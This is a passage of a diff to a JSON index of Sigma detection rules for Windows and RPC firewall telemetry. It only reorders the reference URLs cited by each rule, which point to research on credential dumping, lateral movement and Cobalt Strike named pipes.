@@ -2336,10 +2336,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ @@ -2387,8 +2387,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" 
@@ -2424,8 +2424,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], @@ -2467,8 +2467,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" 
@@ -2504,12 +2504,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ 
@@ -2532,10 +2532,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], "tags": [ @@ -2558,10 +2558,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", "https://github.com/zeronetworks/rpcfirewall", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ 
@@ -2584,8 +2584,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" @@ -2610,10 +2610,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ 
@@ -2637,10 +2637,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], "tags": [ @@ -2663,8 +2663,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" 
@@ -2722,10 +2722,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" ], @@ -2907,8 +2907,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/hlldz/Invoke-Phant0m", "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/hlldz/Invoke-Phant0m", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" ], "tags": [ @@ -2941,9 +2941,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/mrd0x/status/1460597833917251595", "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" ], "tags": [ 
@@ -3189,9 +3189,9 @@ "logsource.product": "windows", "refs": [ "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], "tags": [ @@ -3225,9 +3225,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" ], 
@@ -3263,10 +3263,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], @@ -3301,10 +3301,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], 
@@ -3513,8 +3513,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" ], "tags": [ @@ -3548,9 +3548,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", "https://github.com/codewhitesec/SysmonEnte/", - "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" ], "tags": [ @@ -3583,8 +3583,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/boku7/spawn", "https://github.com/boku7/injectAmsiBypass", + "https://github.com/boku7/spawn", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" ], "tags": [ 
@@ -3619,9 +3619,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1541920424635912196", "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", + "https://twitter.com/SBousseaden/status/1541920424635912196", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml" ], "tags": [ @@ -3735,8 +3735,8 @@ "logsource.category": "sysmon_error", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" ], "tags": [ @@ -3769,8 +3769,8 @@ "logsource.category": "sysmon_status", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" ], "tags": [ 
@@ -3803,8 +3803,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" ], "tags": [ @@ -3829,8 +3829,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" ], "tags": [ @@ -3912,10 +3912,10 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://github.com/SigmaHQ/sigma/issues/253", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://twitter.com/d4rksystem/status/1357010969264873472", "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" ], 
@@ -3941,8 +3941,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "Internal Research", "https://attack.mitre.org/groups/G0010/", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" ], "tags": [ @@ -4166,8 +4166,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://github.com/zcgonvh/EfsPotato", "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", + "https://github.com/zcgonvh/EfsPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" ], "tags": [ 
@@ -4227,18 +4227,18 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://securelist.com/faq-the-projectsauron-apt/75533/", "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" ], "tags": [ 
@@ -4298,9 +4298,9 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml",
 "https://o365blog.com/post/adfs/",
 "https://github.com/Azure/SimuLand",
- "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml"
 ],
 "tags": [
@@ -4683,8 +4683,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying",
 "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing",
+ "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml"
 ],
 "tags": [
@@ -4710,8 +4710,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
+ "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml"
 ],
 "tags": [
@@ -4921,9 +4921,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964",
 "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml"
 ],
 "tags": "No established tags"
@@ -4973,8 +4973,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm",
 "https://attack.mitre.org/software/S0359/",
+ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml"
 ],
 "tags": [
@@ -5034,8 +5034,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
 "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://twitter.com/mattifestation/status/899646620148539397",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml"
 ],
 "tags": [
@@ -5090,8 +5090,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.secureworks.com/blog/ransomware-as-a-distraction",
 "https://twitter.com/menasec1/status/1106899890377052160",
+ "https://www.secureworks.com/blog/ransomware-as-a-distraction",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml"
 ],
 "tags": [
@@ -5229,9 +5229,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427",
+ "https://github.com/sensepost/ruler/issues/47",
 "https://github.com/sensepost/ruler",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
- "https://github.com/sensepost/ruler/issues/47",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml"
 ],
@@ -5463,8 +5463,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647",
+ "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml"
 ],
@@ -5534,8 +5534,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events",
- "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
 "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis",
+ "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml"
 ],
 "tags": [
@@ -5559,9 +5559,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete",
 "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm",
 "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
- "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml"
 ],
 "tags": [
@@ -5692,8 +5692,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1207671369963646976",
 "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
+ "https://twitter.com/SBousseaden/status/1207671369963646976",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml"
 ],
 "tags": [
@@ -5963,15 +5963,15 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
- "https://www.cisecurity.org/controls/cis-controls-list/",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
